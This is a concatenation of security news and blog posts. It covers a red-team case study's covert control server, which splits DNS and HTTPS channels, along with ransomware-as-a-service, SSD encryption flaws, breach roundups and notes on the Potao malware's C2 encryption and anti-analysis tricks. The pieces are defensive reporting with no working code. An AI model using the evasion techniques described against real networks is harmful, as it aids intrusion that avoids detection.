On the wire side, channel interaction will look like a well-formed dynamic DNS request, separate from an HTTPS channel used for data. This split would ensure avoiding traffic correlation.

The Foxtrot Control Server Rises

Once we knew how to set up our covert communications, we set up a rogue control server and named it Foxtrot. Foxtrot was a mechanism we used to facilitate communication between any number of the remote agents.

Having created Foxtrot with a modified FFSend service and a DNS side channel, IBM X-Force Red testers were able to push the initial payload to unsuspecting recipients. The payload circumvented dynamic defenses, helped our red team gain a foothold in the environment and established persistence to freely move data across intercepting proxies. We were also able to execute commands on compromised hosts, even when the defensive team had its security controls and monitoring turned on.

A Word to the Wise Defender

Red teams have the advantage of only needing to find one way in, while blue teams are tasked with securing all ways in and out. This one-sided advantage means that defenders have to keep a close eye on attack tactics, techniques and procedures (TTPs) and expect encryption and covert side channels to challenge existing automated controls.

After having achieved our goals, we came away with some tips for defenders that can help security teams prepare for the TTPs we used.

  • Expect to see the use of client-side encryption gain more prominence in adversarial workflows, and choose security controls accordingly.
  • Expect to see split-data and command channels grow in popularity among attackers, because this technique can help break automated analysis patterns employed by traditional security tools. Defenders should look into behavioral, heuristics-based detection, augmented by a fully staffed security operations center (SOC) to continuously detect split-channel operations.
  • X-Force Red encourages defensive teams to test their incident response (IR) processes against simulated attacker workflows that employ custom tooling capabilities.

What can teams do right now to get ahead of determined threat actors? Step up your security with pre-emptive action in the shape of professional penetration testing, and make sure the scope of the testing gradually covers both hardware and software. You should also consider adopting cognitive solutions to augment analysts’ capabilities and scale up as attacks grow more frequent and complex.

Listen to the X-Force Red in Action podcast series

The post Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red appeared first on Security Intelligence.

Privacy laws do not understand human error

In a world of increasingly punitive regulations like GDPR, the combination of unstructured data and human error represents one of the greatest risks an organization faces. Understanding the differences between unstructured and structured data – and the different approaches needed to secure it – is critical to achieve compliance with the many data privacy regulations that businesses in the U.S. now face. Structured data is comprised of individual elements of information organized to be accessible, … More

The post Privacy laws do not understand human error appeared first on Help Net Security.

Safari Tests ‘Not Secure’ Warning For Unencrypted Websites

Similar to Chrome, Apple's Safari browser is testing a warning system for when users visit websites that aren't protected by HTTPS encryption. "The feature for now is only in Safari Technology Preview 70, a version of the web browser Apple uses to test technology it typically brings to the ordinary version of Safari," reports CNET. From the report: Apple didn't immediately respond to a request for comment on its plans for bringing the warning to mainstream Safari. Apple's browser does warn you already if you have an insecure connection to a very sensitive website for typing in passwords or credit card numbers.

Read more of this story at Slashdot.

Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection

A ransomware-as-a-service program called FilesLocker is offering affiliates commissions of up to 75 percent on all revenue stolen from victims if they can drive enough traffic.

Details about FilesLocker were first posted on Twitter, but a subsequent investigation traced it to Chinese cybercrime forum on TOR, an anonymous online network. Written in C# and available in both Chinese and English, some of the features promoted in the forum include strong encryption, the ability to clear shadow volume copies and customization capabilities.

While FilesLocker is relatively unsophisticated in design, according to security researchers, it encrypts victims’ files through a private key, which is encrypted by an embedded public key. By scanning common system folders such as Documents and Pictures, the ransomware-as-a-service offering encrypts files with a .locked extension and then displays a note demanding 0.18 bitcoin as payment to a specific email address, along with an automatically generated victim ID for tracking purposes.

How Affiliates Qualify For FilesLocker Spoils

The developer behind FilesLocker stipulated that any interested affiliates should have a proven track record in distributing ransomware through phishing schemes or other methods, with a minimum of 10 infections a day. He or she also warned against uploading the program to any service that helps organizations automate the process of scanning for viruses and other security threats. While those who do particularly well can earn three-quarters of what’s gathered from victims, the program includes a base revenue share of 60 percent.

The practice of spreading ransomware through affiliates is becoming more common among cybercriminals. Back in August, for example, cybercriminals pitched a similar ransomware-as-a-service threat dubbed Princess Evolution to potential partners for the same 60 percent revenue share.

Containing Threats Like FilesLocker

While it’s common and natural to panic upon seeing a ransom note pop up on the screen, security leaders should train users to report such incidents as quickly as possible so they can minimize the potential spread of ransomware-as-a-service programs.

IBM Security’s “Ransomware Response Guide” advised security professionals to immediately disconnect any machine infected with ransomware from the corporate network, as well as any access to Wi-Fi or other services that could link back to the attacker.

Isolating a system can give the security team enough time to conduct a proper route cause analysis (RCA) to identify how the ransomware is being distributed, which may mean closing off email or other communication channels for at-risk employees. Since malware developers are starting to work as a team, their potential victims need to do the same.

Sources: BleepingComputer, Malware Hunter, Virus Total

The post Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection appeared first on Security Intelligence.

Researchers crack disk encryption in popular Samsung and Crucial SSDs

Researchers at Netherlands-based Radboud University, which is active in almost all scientific fields, have discovered grave security flaws in several popular solid-state drives (SSD) that promise full disk encryption. In a nutshell, they can be cracked.

Self-encrypting drives are regarded as very safe to use, and they are — unless those drives can be found in the list below:

  • Crucial (Micron) MX100, MX200 and MX300 internal hard disks
  • Samsung T3 and T5 USB external disks
  • Samsung 840 EVO and 850 EVO internal hard disks

The Radboud geeks found that the Windows BitLocker software encryption trusts the built-in hardware encryption in these babies a bit too much – BitLocker essentially trusts self-encrypted drives to do their job, and defaults to the drive’s hardware encryption.

This in itself wouldn’t be much of a problem if the self-encryption mechanism baked in Crucial’s and Samsung’s hardware was bulletproof. But it isn’t.

In one drive, researchers found that the master password responsible for decrypting the stored data was an empty string that could easily be exploited. In another case, they unlocked the drive by messing with its password validation checks.

Even though the flaws were disclosed responsibly – in accordance with the ethics of the white hat community – the drive models listed above remain affected. Researchers believe many other drives that use similar encryption schemes may be affected, and recommend that users employ third-party software encryption tools until patches arrive. Samsung itself now makes the same recommendation. Crucial’s parent company, Micron, promises to deliver a fix soon.

Researcher Bernard van Gastel said, “The affected manufacturers were informed six months ago, in line with common professional practices. The results are being made public today so that users of the affected SSDs can protect their data properly.”

OWASP Top 10 Security Risks – Part II

OWASP Top 10  Security Risks – Part II

It is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we have started a series of posts on the OWASP top 10 security risks.

The OWASP Top 10 list consists of the 10 most seen application vulnerabilities:

  1. Injection
  2. Broken Authentication
  3. Sensitive data exposure
  4. XML External Entities (XXE)
  5. Broken Access control
  6. Security misconfigurations
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with known vulnerabilities
  10. Insufficient logging and monitoring

In our previous post, we explained the first two items on the OWASP Top 10 list: injection and broken authentication.

Continue reading OWASP Top 10 Security Risks – Part II at Sucuri Blog.

Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help 
Application Developers develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organizations outside of Europe that handle the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizen's personal data or allow EU citizens sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation. 

Part 3: Minimizing Application Privacy Risk

Part 3  provides practical application development techniques that can alleviate an application's privacy risk.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.

In addition to Applebees, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that a unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.


Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Fry, that meant the FBI could not access more than half of the devices they tried to access during the period.

“Let me be clear: the FBI supports information security measures, including strong encryption,” Fry said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Potao Express samples


2011- July 2015
  • Aka  Sapotao and node69
  • Group - Sandworm / Quedagh APT
  • Vectors - USB, exe as doc, xls
  • Victims - RU, BY, AM, GE 
  • Victims - MMM group, UA gov
  • has been serving modified versions of the encryption software (Win32/FakeTC) that included a backdoor to selected targets. 
  • Win32/FakeTC - data theft from encrypted drives
  • The Potao main DLL only takes care of its core functionality; the actual spying functions are implemented in the form of downloadable modules. The plugins are downloaded each time the malware starts, since they aren’t stored on the hard drive.
  • 1st Full Plugin and its export function is called Plug. Full plugins run continuously until the infected system is restarted
  • 2nd Light Plugin with an export function Scan. Light plugins terminate immediately after returning a buffer with the information they harvested off the victim’s machine.
  • Some of the plugins were signed with a certificate issued to “Grandtorg”:
  • Traffic 
  • Strong encryption. The data sent is encapsulated using the XML-RPC protocol.
  • MethodName value 10a7d030-1a61-11e3-beea-001c42e2a08b is always present in Potao traffic.
  • After receiving the request the C&C server generates an RSA-2048 public key and signs this generated key with another, static RSA-2048 private key .
  • In 2nd stage the malware generates a symmetric AES-256 key. This AES session key is encrypted with the newly received RSA-2048 public key and sent to the C&C server.
  • The actual data exchange after the key exchange is then encrypted using symmetric cryptography, which is faster, with the AES-256 key
  • The Potao malware sends an encrypted request to the server with computer ID, campaign ID, OS version, version of malware, computer name, current privileges, OS architecture (64 or 32bits) and also the name of the current process.
  • Potao USB - uses social engineering, exe in the root disguised as drive icon
  • Potao Anti RE -  uses the MurmurHash2 algorithm for computing the hashes of the API function names.
  • Potao Anti RE - encryption of strings
  • Russian TrueCrypt Win32/FakeTC - The malicious program code within the otherwise functional TrueCrypt software runs in its own thread. This thread, created at the end of the Mount function, enumerates files on the mounted encrypted drive, and if certain conditions are met, it connects to the C&C server, ready to execute commands from the attackers.
  • IOC


What’s with the TrueCrypt warning?

TrueCrypt, the free open source full disk encryption program favoured by many security-savvy people, including apparently Edward Snowden, is no more. Its website now redirects to its SourceForge page which starts with this message: WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues This page exists only to help migrate existing data […]